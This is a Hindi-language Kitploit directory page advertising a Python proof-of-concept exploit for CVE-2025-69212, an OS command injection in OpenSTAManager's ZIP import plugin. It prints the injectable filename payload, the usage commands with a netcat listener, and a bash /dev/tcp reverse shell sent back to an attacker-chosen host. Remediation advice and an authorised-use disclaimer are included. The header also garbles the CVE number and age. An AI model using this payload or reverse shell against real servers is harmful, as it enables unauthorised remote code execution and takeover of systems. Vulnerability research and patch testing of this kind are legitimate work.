Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-69212 — CVE-2025-69212 के लिए पायथन poc, एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/c0gnit00/cve-2026-69212
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubc0gnit00/cve-2026-69212

CVE-2026-69212

CVE-2025-69212 के लिए पायथन poc, एक्सप्लॉइट

रिपॉजिटरी देखें
222 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-69212 — OpenSTAManager OS कमांड इंजेक्शन (RCE)

CVE-2025-69212 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, OpenSTAManager <= 2.9.8 में एक OS कमांड इंजेक्शन भेद्यता, जो एक प्रमाणित हमलावर को दुर्भावनापूर्ण रूप से तैयार की गई ZIP फ़ाइल अपलोड के माध्यम से रिमोट कोड निष्पादन प्राप्त करने की अनुमति देती है।

एडवाइज़री

  • CVE: CVE-2025-69212
  • GHSA: GHSA-25fp-8w8p-mx36
  • प्रभावित संस्करण: OpenSTAManager <= 2.9.8
  • समाधान संस्करण: OpenSTAManager 2.9.9+
  • CVSS: गंभीर

भेद्यता विवरण

भेद्यता src/Util/XML.php में लगभग पंक्ति 100 पर मौजूद है, जहाँ एप्लिकेशन उपयोगकर्ता-नियंत्रित फ़ाइलनाम को बिना सैनिटाइज़ेशन के सीधे शेल exec() कॉल में पास करता है:

root@kitploit:~
exec('openssl smime -verify -noverify -in "' . $file . '" -inform DER -out "' . $output_file . '"');

जब importFE_ZIP प्लगइन () के माध्यम से एक ZIP संग्रह अपलोड किया जाता है, तो एप्लिकेशन ZIP को निकालता है और प्रत्येक प्रविष्टि के फ़ाइलनाम को में पास करता है। एक हमलावर दुर्भावनापूर्ण फ़ाइलनाम वाला ZIP तैयार कर सकता है जो दोहरे-उद्धरण वाले तर्क से बाहर निकलकर मनमाने शेल कमांड इंजेक्ट करता है।

/actions.php
.p7m
exec()

इंजेक्शन पेलोड (फ़ाइलनाम):

root@kitploit:~
invoice.p7m";<COMMAND>;echo ".p7m

परिणामी शेल निष्पादन:

root@kitploit:~
openssl smime ... -in "invoice.p7m";<COMMAND>;echo ".p7m" ...
#                                   ^^^^^^^^^^^^ injected here

नोट: फ़ॉरवर्ड स्लैश / सीधे फ़ाइलनाम में नहीं आ सकता क्योंकि ZipArchive::extractTo() इसे पाथ सेपरेटर के रूप में मानता है। PoC रिवर्स शेल पेलोड को base64-एन्कोड करके इससे बचता है।


आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी
  • मान्य OpenSTAManager क्रेडेंशियल्स (इम्पोर्ट प्लगइन तक पहुँच वाली कोई भी भूमिका)
  • हमलावर मशीन पर एक लिसनर (जैसे nc)

निर्भरताएँ इंस्टॉल करें:

root@kitploit:~
pip install requests

उपयोग

root@kitploit:~
python3 CVE-2025-69212.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> --lhost <YOUR_IP> --lport <YOUR_PORT>

विकल्प

तर्कआवश्यकविवरण
-u, --urlहाँलक्ष्य का आधार URL (जैसे http://target.htb)
-U, --usernameहाँOpenSTAManager उपयोगकर्ता नाम
-P, --passwordहाँOpenSTAManager पासवर्ड
--lhostहाँरिवर्स शेल के लिए आपका IP पता
--lportहाँरिवर्स शेल के लिए आपका लिसनिंग पोर्ट
--proxyनहींHTTP प्रॉक्सी (जैसे http://127.0.0.1:8080)

उदाहरण

root@kitploit:~
# Start listener
nc -lvnp 4444

# Run exploit
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444

# Route through Burp Suite
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444 --proxy http://127.0.0.1:8080

यह कैसे काम करता है

  1. प्रमाणीकरण — प्रदान किए गए क्रेडेंशियल्स का उपयोग करके OpenSTAManager में लॉग इन करता है
  2. पेलोड निर्माण — एक ZIP संग्रह तैयार करता है जिसमें एक .p7m फ़ाइल होती है जिसके फ़ाइलनाम में इंजेक्ट किया गया कमांड शामिल होता है
  3. Base64 एन्कोडिंग — रिवर्स शेल (bash -i >& /dev/tcp/LHOST/LPORT 0>&1) को फ़ाइलनाम में फ़ॉरवर्ड स्लैश से बचने के लिए base64-एन्कोड किया जाता है
  4. अपलोड — importFE_ZIP प्लगइन के माध्यम से ZIP को /actions.php पर POST करता है
  5. निष्पादन — सर्वर ZIP को निकालता है, दुर्भावनापूर्ण फ़ाइलनाम को exec() में पास करता है, जिससे रिवर्स शेल ट्रिगर होता है
  6. थ्रेडिंग — अपलोड एक डेमन थ्रेड में चलता है क्योंकि bash HTTP कनेक्शन को खुला रखता है; स्क्रिप्ट प्रतिक्रिया की प्रतीक्षा किए बिना सफाई से बाहर निकल जाती है

उपचार

OpenSTAManager 2.9.9 या उसके बाद के संस्करण में अपडेट करें, जो शेल कमांड में पास करने से पहले फ़ाइलनामों को सैनिटाइज़ करता है।

यदि तुरंत पैच करना संभव नहीं है, तो importFE_ZIP प्लगइन अक्षम करें या केवल विश्वसनीय उपयोगकर्ताओं के लिए /actions.php तक पहुँच प्रतिबंधित करें।


अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। इसका उपयोग केवल उन्हीं सिस्टम पर करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। जिन सिस्टम के स्वामी आप नहीं हैं, उनके विरुद्ध अनधिकृत उपयोग अवैध और अनैतिक है। लेखक इस टूल से होने वाले किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है।


संदर्भ

  • GHSA-25fp-8w8p-mx36
  • OpenSTAManager GitHub
  • NVD - CVE-2025-69212
टूल डाउनलोड करें